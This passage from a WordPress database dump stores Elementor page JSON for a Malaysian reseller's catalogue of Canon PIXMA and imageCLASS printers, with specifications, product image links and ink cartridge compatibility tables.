Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6925,3302,'_elementor_version','2.5.14'),(6928,3303,'_wp_page_template','template-fullwidth.php'),(6929,3303,'_elementor_edit_mode','builder'),(6930,3303,'_elementor_template_type','post'),(6931,3303,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0Printing for Low-Cost Printing<\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"1ba38c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"46\",\"right\":\"46\",\"bottom\":\"46\",\"left\":\"46\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing<\\/p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.<\\/p><p>Print, Scan, Copy, Fax<\\/p><p>ISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct<\\/p><p>Recommended print volume: 50 - 200 pages<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"189f9a2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"37\",\"right\":\"37\",\"bottom\":\"37\",\"left\":\"37\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>\\u00a0<\\/p><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center><\\/center><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Printing<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p>Smarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 43ppm<\\/li><li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li><li>FPOT: 6.2secs. (A4)<\\/li><li>Max. paper input capacity: Up to 2,300 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p><\\/div><p>With cutting-edge features, the MF426dw is set to boost work productivity in the modern office.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 38ppm<\\/li><li>Recommended monthly print volume: 750 - 4,000 pages<\\/li><li>FPOT: 5.5secs. (A4)<\\/li><li>Max. paper input capacity: Up to 900 sheets<\\/li><li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>imagePROGRAF PRO-500<\\/p><\\/td><td width=\\\"208\\\"><p>Maintenance Cartridge MC-20<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PFI-50 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td 